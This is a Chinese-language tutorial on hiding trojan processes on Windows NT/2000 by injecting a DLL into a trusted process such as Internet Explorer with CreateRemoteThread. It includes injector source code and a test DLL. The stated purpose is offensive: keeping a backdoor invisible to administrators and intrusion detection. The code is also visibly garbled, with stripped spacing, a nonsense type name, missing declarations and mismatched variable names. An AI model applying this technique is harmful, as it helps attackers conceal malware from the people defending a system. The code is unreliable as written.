Windows NT2000系统下进程的隐藏

WindowsNT2000系统下进程的隐藏

关键字进程线程木马动态链接库木马程序(也称后门程序)是能被控制的运行在远程主机上的程序，由于木马程序是运行在远程主机上，所以进程的隐藏无疑是大家关心的焦点。本文分析了WindowsNT/2000系统下进程隐藏的基本技术和方法，并着重讨论运用线程嫁接技术如何实现WindowsNT/2000系统中进程的隐藏。1基本原理在WIN95/98中，只需要将进程注册为系统服务就能够从进程查看器中隐形，可是这一切在WindowsNT/2000中却完全不同，无论木马从端口、启动文件上如何巧妙地隐藏自己，始终都不能躲过WindowsNT/2000的任务管理器，WindowsNT/2000的任务管理器均能轻松显示出木马进程，难道在WindowsNT/2000下木马真的再也无法隐藏自己的进程了？我们知道，在WINDOWS系统下，可执行文件主要是Exe和Com文件，这两种文件在运行时都有一个共同点，会生成一个独立的进程，寻找特定进程是我们发现木马的方法之一，随着入侵检测软件的不断发展，关联进程和SOCKET已经成为流行的技术，假设一个木马在运行时被检测软件同时查出端口和进程，我们基本上认为这个木马的隐藏已经完全失败。在WindowsNT/2000下正常情况用户进程对于系统管理员来说都是可见的，要想做到木马的进程隐藏，有两个办法，第一是让系统管理员看不见你的进程；第二是不使用进程。本文以第二种方法为例加以讨论，其基本原理是将自已的木马以线程方式嫁接于远程进程之中，远程进程则是合法的用户程序，这样用户管理者看到的只是合法进程，而无法发现木马线程的存在，从而达到隐藏的目的。2实现方法

为了弄清实现方法，我们必须首先了解Windows系统的另一种"可执行文件"DLL，DLL是DynamicLinkLibrary（动态链接库）的缩写，DLL文件是Windows的基础，因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑，是由多个功能函数构成，它并不能独立运行，一般都是由进程加载并调用的。因为DLL文件不能独立运行，所以在进程列表中并不会出现DLL，假设我们编写了一个木马DLL，并且通过别的进程来运行它，那么无论是入侵检测软件还是进程列表中，都只会出现那个进程而并不会出现木马DLL，如果那个进程是可信进程，（例如浏览器程序IEXPLORE.EXE，没人会怀疑它是木马吧？）那么我们编写的DLL作为那个进程的一部分，也将成为被信赖的一员，也就达到了隐藏的目的。

运行DLL方法有多种，但其中最隐蔽的方法是采用动态嵌入技术，动态嵌入技术指的是将自己的代码嵌入正在运行的进程中的技术。理论上来说，在Windows中的每个进程都有自己的私有内存空间，别的进程是不允许对这个私有空间进行操作的，但是实际上，我们仍然可以利用种种方法进入并操作进程的私有内存。动态嵌入技术有多种如：窗口Hook、挂接API、远程线程等，这里介绍一下远程线程技术，它只要有基本的进线程和动态链接库的知识就可以很轻松地完成动态嵌入。远程线程技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。我们知道，在进程中，可以通过CreateThread函数创建线程，被创建的新线程与主线程（就是进程启动时被同时自动建立的那个线程）共享地址空间以及其他的资源。但是很少有人知道，通过CreateRemoteThread也同样可以在另一个进程内创建新线程，被创建的远程线程同样可以共享远程进程（是远程进程）的地址空间，所以，实际上，我们通过一个远程线程，进入了远程进程的内存地址空间，也就拥有了那个远程进程相当的权限。3实施步骤1）用Process32Next（）函数找到宿主进程，获取宿主进程ID，并用OpenProcess（）函数打开宿主进程。2）用VirtualAllocEx（）函数分配远程进程地址空间中的内存。3）用WriteProcessMemory（）函数将待隐藏的DLL的路径名。4）拷贝到步骤二已经分配的内存中。5）用GetProcAddress（）函数获取LoadlibraryA（）函数的实地址（在kernel32.dll中）。6）用CreateRemoteThread（）函数在远程进程中创建一个线程。7）它调用正确的LoadlibraryA（）函数。8）为它传递步骤二中分配的内存地址。4具体实例下面是在C++Builder4.0环境下编写的运用远程线程技术隐藏木马的程序代码：#include<vcl.h>#include<windows.h>#include<stdio.h>#include<tlhelp32.h>//该头文件包涵了进程操作的API函数#pragmahdrstop#include"Unit1.h"#pragmapackage(smart_init)#pragmaresource"*.dfm"InsistingpszLibFileName;//存放待隐藏的DLL文件名HANDLEhProcessSnap=NULL;//进程快照句柄HANDLEhRemoteProcess;//远程进程句柄LPVOIDpszLibFileRemote;//远程进程中分配给文件名的空间HMODULEphmd;//存放kernel32.dll句柄HANDLEhRemoteThread1=NULL;//存放远程线程句柄TForm1*Form1;//__fastcallTForm1::TForm1(TComponent*Owner):TForm(Owner){}//void__fastcallTForm1::Button1Click(TObject*Sender)pe32.dwSize=sizeof(PROCESSENTRY32);if(Process32First(hProcessSnap，&pe32))//获取第一个进程{do{AnsiStringte;te=pe32.szExeFile;if(te.Pos("iexplore.exe")||te.Pos("IEXPLORE.EXE"))//找到宿主进程，以IEXPLORE.EXE为例{dwRemoteProcessId=pe32.th32ProcessID;break;}}while(Process32Next(hProcessSnap，&pe32));//获取下一个进程}else{MessageBox(NULL，"取第一个进程失败"，""，MB_OK);exit(0);}hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE，FALSE，dwRemoteProcessId);//打开远程进程pszLibFileName=GetCurrentDir()+"\\"+"hide.dll";//假设hide.dll是待隐藏的进程intcb=(1+pszLibFileName.Length())*sizeof(char);//计算dll文件名长度pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess，NULL，cb，MEM_COMMIT，PAGE_READWRITE);//申请存放文件名的空间BOOLReturnCode=WriteProcessMemory(hRemoteProcess，pszLibFileRemote，(LPVOID)pszLibFileName.c_str()，cb，NULL);//把dll文件名写入申请的空间phmd=GetModuleHandle("kernel32.dll");LPTHREAD_START_ROUTINEfnStartAddr=(LPTHREAD_START_ROUTINE)GetProcAddress(phmd，"LoadLibraryA");//获取动态链接库函数地址hRemoteThread1=CreateRemoteThread(hRemoteProcess，NULL，0，pfnStartAddr，pszLibFileRemote，0，NULL);//创建远程线程该程序编译后命名为RmtDll.exe，运行时点击界面上的按钮即可。至此，远程嵌入顺利完成，为了试验我们的hide.dll是不是已经正常地在远程线程运行，我同样在C++Builder4.0环境下编写并编译了下面的hide.dll作为测试：#include<vcl.h>#include<windows.h>#pragmahdrstop#pragmaargsusedBOOLWINAPIDllEntryPoint(HINSTANCEhinst，unsignedlongreason，void*lpReserved){charszProcessId[64];switch(reason){caseDLL_PROCESS_ATTACH:{//获取当前进程IDitoa(GetCurrentProcessId()，szProcessId，10);MessageBox(NULL，szProcessId，"RemoteDLL"，MB_OK);break;}default:}returnTRUE;}

当使用RmtDll.exe程序将这个hide.dll嵌入IEXPLORE.EXE进程后假设PID=1208），该测试DLL弹出了1208字样的确认框，同时使用PS工具也能看到:

ProcessID:1208

C:\WINNT\IEXPLORE.EXE(0x00400000)

……

C:\